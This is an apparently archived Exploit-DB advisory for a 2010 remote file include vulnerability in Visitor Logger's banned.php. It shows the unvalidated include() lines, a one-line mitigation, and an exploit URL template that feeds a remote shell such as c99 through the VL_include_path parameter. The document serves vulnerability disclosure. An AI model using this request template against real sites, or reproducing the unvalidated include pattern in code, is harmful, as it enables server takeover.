Visitor Logger (banned.php) Remote File Include Vulnerability

vendor:

Visitor Logger

by:

bd0rk

8,8

CVSS

HIGH

Remote File Include

CWE

Product Name: Visitor Logger

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Visitor Logger (banned.php) Remote File Include Vulnerability

An attacker can use c99-shellcode, for example, to exploit a vulnerability in the banned.php file of the Visitor Logger application. The vulnerability exists in lines three to four of the file, where the application includes a file from the VL_include_path parameter without proper validation.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.

Source

Exploit-DB raw data:

#-> Visitor Logger (banned.php) Remote File Include Vulnerability

#-> Date: 2010/05/31

#-> Vendor: http://www.graviton-mediatech.com

#-> Download: http://www.graviton-mediatech.com/downloads/Visitor-Logger/Visitor-Logger.zip

#-> Googledork: n/a

#-> Discovered by bd0rk

#-> Contact: bd0rk[at]school-of-hack.net or bd0rk[at]hackermail.com

#-> Website: www.soh-crew.it.tt

#-> Gr33tings: TheJT, Luna-Tic, Frauenarzt, Punkti ;-)

-------------------------------------------------------------------------------

Description 1: Look in file banned.php line three to four and you can see this

if (file_exists($VL_include_path."/banned.txt")) {
	include($VL_include_path."/banned.txt");

-------------------------------------------------------------------------------

[+]Exploit: http://[target].com/[logger_path]/banned.php?VL_include_path=[SHELLCODE]


--> An attacker can use c99-shellcode, for example.




#### The 21 years old, german Hacker bd0rk ####